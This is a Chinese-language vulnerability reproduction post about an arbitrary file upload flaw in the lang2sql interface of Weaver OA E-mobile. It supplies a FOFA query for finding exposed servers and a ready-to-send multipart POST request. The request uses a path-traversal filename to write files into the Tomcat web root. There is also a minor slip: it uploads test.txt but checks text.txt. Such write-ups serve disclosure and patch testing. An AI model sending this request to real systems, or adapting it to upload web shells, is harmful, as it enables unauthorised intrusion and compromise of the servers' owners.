泛微OA_lang2sql 任意文件上传漏洞复现

简介

泛微OA E-mobile系统 lang2sql接口存在任意文件上传漏洞,由于后端源码中没有对文件没有校验,导致任意文件上传。攻击者可利用该参数构造恶意数据包进行上传漏洞攻击。

漏洞复现

FOFA语法:

title="移动管理平台-企业管理"

泛微OA_lang2sql 任意文件上传漏洞复现_第1张图片

页面访问如下:

泛微OA_lang2sql 任意文件上传漏洞复现_第2张图片

影响的版本偏系统版本比较老一点的系统

POC:

/emp/lang2sql?client_type=1&lang_tag=1

拼接URL进行访问,不存在该文件可能返回404页面

泛微OA_lang2sql 任意文件上传漏洞复现_第3张图片

该文件若存在可尝试进行利用验证

泛微OA_lang2sql 任意文件上传漏洞复现_第4张图片

访问该文件存在页面如上

漏洞验证:

POST /emp/lang2sql?client_type=1&lang_tag=1 HTTP/1.1
Host: IP
User-Agent: Mozilla
Accept: text/html
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 205
Content-Type: multipart/form-data;boundary=----test

------test
Content-Disposition: form-data; name="file"; filename="../../../../appsvr/tomcat/webapps/ROOT/test.txt"

1234
------test--

泛微OA_lang2sql 任意文件上传漏洞复现_第5张图片

尝试访问:

http://ip:port/text.txt

泛微OA_lang2sql 任意文件上传漏洞复现_第6张图片

文件上传成功

修复建议

  • 厂商已提供漏洞修补方案

  • 升级至新版本

免责声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习交流使用,如若非法他用,与平台和本文作者无关,需自行负责!


结语

没有人规定,一朵花一定要成长为向日葵或者玫瑰。

你可能感兴趣的:(漏洞复现,安全)